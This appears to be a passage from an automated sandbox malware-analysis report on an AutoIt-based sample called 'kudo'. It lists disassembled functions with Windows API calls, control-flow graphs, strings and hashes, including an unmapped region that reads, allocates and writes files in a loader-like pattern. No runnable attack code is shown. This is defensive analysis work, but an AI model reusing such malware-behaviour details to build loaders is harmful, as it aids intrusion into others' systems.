                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                      • String ID:
                                                      • API String ID: 1500180987-0
                                                      • Opcode ID: 5cabd7135b67a0cdca25aaf92a1012929676c6178554f07901f39f5fc551643b
                                                      • Instruction ID: af5f26c0921689228149e57d3835c5e33c89ff76a4ef47882f20c4e9bc60c898
                                                      • Opcode Fuzzy Hash: 5cabd7135b67a0cdca25aaf92a1012929676c6178554f07901f39f5fc551643b
                                                      • Instruction Fuzzy Hash: 7CC11EB1D00229AADF11DF99DC85ADEB7BDFF45310F0040A6F609E7291DB309A858F66
                                                      Function 0080708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00804706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008C52F8,?,008037AE,?), ref: 00804724
                                                        • Part of subcall function 0082050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00807165), ref: 0082052D
                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008071A8
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0083E8C8
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0083E909
                                                      • RegCloseKey.ADVAPI32(?), ref: 0083E947
                                                      • _wcscat.LIBCMT ref: 0083E9A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                      • API String ID: 2673923337-2727554177
                                                      • Opcode ID: 15dbde8303ec0f3bec7426e14bd582497d75c8a1226ab6bdf4f4a28974a70d31
                                                      • Instruction ID: a35a6896d32fa26a3efa252a941fb66170c50cb3e46c985e35790262c7c72aa5
                                                      • Opcode Fuzzy Hash: 15dbde8303ec0f3bec7426e14bd582497d75c8a1226ab6bdf4f4a28974a70d31
                                                      • Instruction Fuzzy Hash: D9714871508311AEC714EF69EC81DABBBB8FF94310F40492EF545C72A1EB71A958CB92
                                                      Function 00803A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00803A50
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00803A5F
                                                      • LoadIconW.USER32(00000063), ref: 00803A76
                                                      • LoadIconW.USER32(000000A4), ref: 00803A88
                                                      • LoadIconW.USER32(000000A2), ref: 00803A9A
                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00803AC0
                                                      • RegisterClassExW.USER32(?), ref: 00803B16
                                                        • Part of subcall function 00803041: GetSysColorBrush.USER32(0000000F), ref: 00803074
                                                        • Part of subcall function 00803041: RegisterClassExW.USER32(00000030), ref: 0080309E
                                                        • Part of subcall function 00803041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008030AF
                                                        • Part of subcall function 00803041: LoadIconW.USER32(000000A9), ref: 008030F2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 2880975755-4155596026
                                                      • Opcode ID: 551e4427c51bfbb63d255da424e8cd4f39a992aacc2ded7b211ef15c7a856e1b
                                                      • Instruction ID: 30c2dad571cf4e43a730b143ee52cfaa34911255dd7b9b15eb18b268b5452784
                                                      • Opcode Fuzzy Hash: 551e4427c51bfbb63d255da424e8cd4f39a992aacc2ded7b211ef15c7a856e1b
                                                      • Instruction Fuzzy Hash: 64214671D00708AFEF10DFA8EC09F9D7BF5FB08711F10012AE600AA2A2D3B566908F84
                                                      Function 00803766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                      • API String ID: 1825951767-3513169116
                                                      • Opcode ID: 92f15d66ff5e737773f21e0e0311c14d199f44ba789ed7f20f6e91794749368a
                                                      • Instruction ID: 4374bf16f3cdc2da117fc866962a2cddddf7980903495d5a36e3003e58e15ba1
                                                      • Opcode Fuzzy Hash: 92f15d66ff5e737773f21e0e0311c14d199f44ba789ed7f20f6e91794749368a
                                                      • Instruction Fuzzy Hash: D3A14C7290022D9ACF45EBA8DC91EEEB778FF15310F000529E516E71D2DF746A48CBA1
                                                      Function 00A3D9F8 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1007 a3d9f8-a3da4a call a3d8f8 CreateFileW 1010 a3da53-a3da60 1007->1010 1011 a3da4c-a3da4e 1007->1011 1014 a3da73-a3da8a VirtualAlloc 1010->1014 1015 a3da62-a3da6e 1010->1015 1012 a3dbac-a3dbb0 1011->1012 1016 a3da93-a3dab9 CreateFileW 1014->1016 1017 a3da8c-a3da8e 1014->1017 1015->1012 1019 a3dabb-a3dad8 1016->1019 1020 a3dadd-a3daf7 ReadFile 1016->1020 1017->1012 1019->1012 1021 a3db1b-a3db1f 1020->1021 1022 a3daf9-a3db16 1020->1022 1024 a3db21-a3db3e 1021->1024 1025 a3db40-a3db57 WriteFile 1021->1025 1022->1012 1024->1012 1026 a3db82-a3dba7 CloseHandle VirtualFree 1025->1026 1027 a3db59-a3db80 1025->1027 1026->1012 1027->1012
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00A3DA3D
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457539916.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_a3d000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                      • Instruction ID: 06e375d91b6f486a65cee9d911573adaa149c53cbebba7f66314edf4b3f9b435
                                                      • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                      • Instruction Fuzzy Hash: 7D51F975A50208FBEF20DFA4DC49FDEB778AF48701F108554F61AEB180DA749A44DB64
                                                      Function 008039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1047 8039d5-803a45 CreateWindowExW * 2 ShowWindow * 2
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00803A03
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00803A24
                                                      • ShowWindow.USER32(00000000), ref: 00803A38
                                                      • ShowWindow.USER32(00000000), ref: 00803A41
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: f99c9c30b9f30afe52cc3b6c698ca4b60e65617d92dd2eab2e9b5ad5957df94b
                                                      • Instruction ID: 91addf3130cd1f95e526dae72384ee4ce267e45ec8f46b874a11a4b34a7193c8
                                                      • Opcode Fuzzy Hash: f99c9c30b9f30afe52cc3b6c698ca4b60e65617d92dd2eab2e9b5ad5957df94b
                                                      • Instruction Fuzzy Hash: 09F0DA715416907EEF316727AC49E6B3EBDF7C6F50F00412ABA04E2171C6752891DAB0
                                                      Function 0080407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1048 80407c-804092 1049 804098-8040ad call 807a16 1048->1049 1050 80416f-804173 1048->1050 1053 8040b3-8040d3 call 807bcc 1049->1053 1054 83d3c8-83d3d7 LoadStringW 1049->1054 1057 83d3e2-83d3fa call 807b2e call 806fe3 1053->1057 1058 8040d9-8040dd 1053->1058 1054->1057 1068 8040ed-80416a call 822de0 call 80454e call 822dbc Shell_NotifyIconW call 805904 1057->1068 1069 83d400-83d41e call 807cab call 806fe3 call 807cab 1057->1069 1060 8040e3-8040e8 call 807b2e 1058->1060 1061 804174-80417d call 808047 1058->1061 1060->1068 1061->1068 1068->1050 1069->1068
                                                      APIs
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0083D3D7
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                      • _memset.LIBCMT ref: 008040FC
                                                      • _wcscpy.LIBCMT ref: 00804150
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00804160
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                      • String ID: Line:
                                                      • API String ID: 3942752672-1585850449
                                                      • Opcode ID: 560a8a4f2576efa22a8c7605fa4674a43a19f52ef852342b87f7b3d30b695da0
                                                      • Instruction ID: 2fb0ee4287a84917368a580d049da7f609c78091439c637db7b5a6af5b6f9900
                                                      • Opcode Fuzzy Hash: 560a8a4f2576efa22a8c7605fa4674a43a19f52ef852342b87f7b3d30b695da0
                                                      • Instruction Fuzzy Hash: CF31A0B2408705AAD7A1EB64EC45FDB77E8FF44314F10451AB685D21D1EB70A688C793
                                                      Function 0082541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1142 82541d-825436 1143 825453 1142->1143 1144 825438-82543d 1142->1144 1145 825455-82545b 1143->1145 1144->1143 1146 82543f-825441 1144->1146 1147 825443-825448 call 828b28 1146->1147 1148 82545c-825461 1146->1148 1156 82544e call 828db6 1147->1156 1149 825463-82546d 1148->1149 1150 82546f-825473 1148->1150 1149->1150 1153 825493-8254a2 1149->1153 1154 825483-825485 1150->1154 1155 825475-825480 call 822de0 1150->1155 1159 8254a4-8254a7 1153->1159 1160 8254a9 1153->1160 1154->1147 1158 825487-825491 1154->1158 1155->1154 1156->1143 1158->1147 1158->1153 1161 8254ae-8254b3 1159->1161 1160->1161 1164 8254b9-8254c0 1161->1164 1165 82559c-82559f 1161->1165 1166 8254c2-8254ca 1164->1166 1167 825501-825503 1164->1167 1165->1145 1166->1167 1168 8254cc 1166->1168 1169 825505-825507 1167->1169 1170 82556d-82556e call 830ba7 1167->1170 1171 8254d2-8254d4 1168->1171 1172 8255ca 1168->1172 1173 82552b-825536 1169->1173 1174 825509-825511 1169->1174 1183 825573-825577 1170->1183 1178 8254d6-8254d8 1171->1178 1179 8254db-8254e0 1171->1179 1180 8255ce-8255d7 1172->1180 1176 82553a-82553d 1173->1176 1177 825538 1173->1177 1181 825513-82551f 1174->1181 1182 825521-825525 1174->1182 1184 8255a4-8255a8 1176->1184 1185 82553f-82554b call 8246e6 call 830e5b 1176->1185 1177->1176 1178->1179 1179->1184 1186 8254e6-8254ff call 830cc8 1179->1186 1180->1145 1187 825527-825529 1181->1187 1182->1187 1183->1180 1188 825579-82557e 1183->1188 1189 8255ba-8255c5 call 828b28 1184->1189 1190 8255aa-8255b7 call 822de0 1184->1190 1203 825550-825555 1185->1203 1202 825562-82556b 1186->1202 1187->1176 1188->1184 1193 825580-825591 1188->1193 1189->1156 1190->1189 1194 825594-825596 1193->1194 1194->1164 1194->1165 1202->1194 1204 82555b-82555e 1203->1204 1205 8255dc-8255e0 1203->1205 1204->1172 1206 825560 1204->1206 1205->1180 1206->1202
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                      • String ID:
                                                      • API String ID: 1559183368-0
                                                      • Opcode ID: 2ae4adc1162bedfe6bc9a4b740345a455ff32de3de61d0c655ced6f3c4ec0989
                                                      • Instruction ID: 9f0a094f49cf9064cf0d3e41be2ceab6228693adeea463916dc582922044740b
                                                      • Opcode Fuzzy Hash: 2ae4adc1162bedfe6bc9a4b740345a455ff32de3de61d0c655ced6f3c4ec0989
                                                      • Instruction Fuzzy Hash: 5A51C3B0A40B29DBCB249F69F98066EB7A2FF40335F248729F825D62D0D7709DD08B45
                                                      Function 0080686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1207 80686a-806891 call 804ddd 1210 83e031-83e041 call 86955b 1207->1210 1211 806897-8068a5 call 804ddd 1207->1211 1215 83e046-83e048 1210->1215 1211->1210 1216 8068ab-8068b1 1211->1216 1217 83e067-83e0af call 820db6 1215->1217 1218 83e04a-83e04d call 804e4a 1215->1218 1221 83e052-83e061 call 8642f8 1216->1221 1222 8068b7-8068d9 call 806a8c 1216->1222 1227 83e0b1-83e0bb 1217->1227 1228 83e0d4 1217->1228 1218->1221 1221->1217 1230 83e0cf-83e0d0 1227->1230 1231 83e0d6-83e0e9 1228->1231 1232 83e0d2 1230->1232 1233 83e0bd-83e0cc 1230->1233 1234 83e260-83e271 call 822d55 call 804e4a 1231->1234 1235 83e0ef 1231->1235 1232->1231 1233->1230 1245 83e273-83e283 call 807616 call 805d9b 1234->1245 1237 83e0f6-83e0f9 call 807480 1235->1237 1240 83e0fe-83e120 call 805db2 call 8673e9 1237->1240 1251 83e122-83e12f 1240->1251 1252 83e134-83e13e call 8673d3 1240->1252 1258 83e288-83e2b8 call 85f7a1 call 820e2c call 822d55 call 804e4a 1245->1258 1254 83e227-83e237 call 80750f 1251->1254 1260 83e140-83e153 1252->1260 1261 83e158-83e162 call 8673bd 1252->1261 1254->1240 1263 83e23d-83e25a call 80735d 1254->1263 1258->1245 1260->1254 1270 83e176-83e180 call 805e2a 1261->1270 1271 83e164-83e171 1261->1271 1263->1234 1263->1237 1270->1254 1276 83e186-83e19e call 85f73d 1270->1276 1271->1254 1282 83e1c1-83e1c4 1276->1282 1283 83e1a0-83e1bf call 807de1 call 805904 1276->1283 1285 83e1f2-83e1f5 1282->1285 1286 83e1c6-83e1e1 call 807de1 call 806839 call 805904 1282->1286 1307 83e1e2-83e1f0 call 805db2 1283->1307 1288 83e1f7-83e200 call 85f65e 1285->1288 1289 83e215-83e218 call 86737f 1285->1289 1286->1307 1288->1258 1301 83e206-83e210 call 820e2c 1288->1301 1294 83e21d-83e226 call 820e2c 1289->1294 1294->1254 1301->1240 1307->1294
                                                      APIs
                                                        • Part of subcall function 00804DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00804E0F
                                                      • _free.LIBCMT ref: 0083E263
                                                      • _free.LIBCMT ref: 0083E2AA
                                                        • Part of subcall function 00806A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00806BAD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                      • API String ID: 2861923089-1757145024
                                                      • Opcode ID: f526fa03061998cd83061abe549898df25e58eaafa7c6c45c510b33316e107ad
                                                      • Instruction ID: 78a7d5e5f0fa65ae1a607c131a9364d1b4ad713ce6482d53218740aaae8bea3c
                                                      • Opcode Fuzzy Hash: f526fa03061998cd83061abe549898df25e58eaafa7c6c45c510b33316e107ad
                                                      • Instruction Fuzzy Hash: 18913871900219AFCF04EFA8DC919EEB7B8FF54314F10442AF815EB2A1DB74A955CB91
                                                      Function 00A3F4C8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 167fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1311 a3f4c8-a3f640 call a3d0d8 call a3f3b8 CreateFileW 1318 a3f642 1311->1318 1319 a3f647-a3f657 1311->1319 1320 a3f712-a3f717 1318->1320 1322 a3f659 1319->1322 1323 a3f65e-a3f678 VirtualAlloc 1319->1323 1322->1320 1324 a3f67a 1323->1324 1325 a3f67f-a3f696 ReadFile 1323->1325 1324->1320 1326 a3f69a-a3f6af call a3e148 1325->1326 1327 a3f698 1325->1327 1329 a3f6b4-a3f6ec call a3f3f8 call a3f168 1326->1329 1327->1320 1334 a3f708-a3f710 1329->1334 1335 a3f6ee-a3f703 call a3f448 1329->1335 1334->1320 1335->1334
                                                      APIs
                                                        • Part of subcall function 00A3F3B8: Sleep.KERNEL32(000001F4), ref: 00A3F3C9
                                                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A3F633
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457539916.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_a3d000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CreateFileSleep
                                                      • String ID: VN05ZPDE5CBL2F09SR2K77RU442VZR
                                                      • API String ID: 2694422964-2707439306
                                                      • Opcode ID: efdfaf9201dfe7beccb311615f10bc3b5b1efd7c7713f520fa862aa830e0b6c4
                                                      • Instruction ID: afd43da65933984e8863fb05fc8c79d9370d1191b7b24b663e9b1c4ec8c3e759
                                                      • Opcode Fuzzy Hash: efdfaf9201dfe7beccb311615f10bc3b5b1efd7c7713f520fa862aa830e0b6c4
                                                      • Instruction Fuzzy Hash: A171B130D14288DAEF11DBB4C945BDFBBB9AF15304F044199E6487B2C1D7BA0B09CBA6
                                                      Function 008035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008035A1,SwapMouseButtons,00000004,?), ref: 008035D4
                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,008035A1,SwapMouseButtons,00000004,?,?,?,?,00802754), ref: 008035F5
                                                      • RegCloseKey.ADVAPI32(00000000,?,?,008035A1,SwapMouseButtons,00000004,?,?,?,?,00802754), ref: 00803617
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 3677997916-824357125
